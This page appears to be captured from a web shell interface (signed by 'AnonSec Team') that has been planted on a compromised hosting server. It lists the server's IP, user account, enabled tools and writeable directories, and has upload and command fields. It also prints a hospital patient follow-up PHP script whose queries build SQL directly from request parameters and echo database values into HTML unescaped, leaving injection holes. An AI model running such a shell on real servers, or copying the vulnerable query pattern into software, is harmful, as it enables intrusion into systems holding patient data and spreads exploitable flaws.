Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.190.239.252
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/opdFollow_up.php
<?php session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
require_once('../patientmanager.php');
include 'dashboarddocument.php';
include 'header.php';
if(isset($_POST['signup'])) 
{
   PatientManager::transferreferal("$_GET[prescriptionid]","$_GET[patientid]","$_POST[Transfer_IPD]","$_POST[Word]","$_POST[Bed]","$_POST[Referred_To]","$_POST[Name_Hospital]","$_POST[Name_of_Consultant]","$_POST[followup]","$_POST[followup_date]","$_POST[enteredby]");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
  <title>Document</title>

   </head>
    <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
   <form method='post' name='signup'>
       	<?php
    	$narayan=LoginManager::currentUser();
$harilal=LoginManager::getUserTypeByuname("$narayan");
    		$sql ="SELECT * FROM site_users WHERE userno='$harilal'";
		$qsql = mysqli_query($con,$sql);
		if($re = mysqli_fetch_array($qsql))
		{
		    		$sql1 ="SELECT * FROM addaspatient WHERE prescriptionid='$_GET[prescriptionid]'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re1 = mysqli_fetch_array($qsql1))
		{
		    
		    echo"
            <input type='hidden' name='Name_Hospital' value='$re[entered_by]'>
             <input type='hidden' name='Name_of_Consultant' value='$re1[Admitted_Under]'>
            ";
		}
		}
		?>
       
       
  <body>
          <h3 align='center'>Follow Up</h3>
<input type="hidden" name="followup" value='on'>
<div> <label for="item">follow-up Date<span>*</span><input name="followup_date" type="date">
</div><input type="submit" name="signup" value="Submit">
</form>
</body>
</html> 

Anon7 - 2022
AnonSec Team